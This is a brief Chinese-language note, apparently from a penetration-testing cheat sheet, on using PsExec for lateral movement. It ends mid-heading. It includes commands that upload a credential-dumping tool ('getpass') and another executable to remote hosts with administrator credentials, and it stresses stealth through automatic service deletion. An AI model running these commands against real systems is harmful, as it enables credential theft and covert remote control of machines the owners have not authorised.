01. Psexec
PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。
下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/psexec
原理:
建立IPC连接,使用Psexec无需输入密码
第一次运行会弹框,
加 -accepteula 参数可绕过
-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)
-d 不等待程序执行完就返回
上传一个本地的getpass到你远程连接的服务器上执行:
Psexec.exe \ip -u user -p pass -c c:\getpass.exe –d
PsExec.exe \10.10.10.201 -u administrator -p 1qaz@WSX -c c:\5599.exe -d
与官方psexec.exe相比会自动删除服务,增加隐蔽性
执行命令: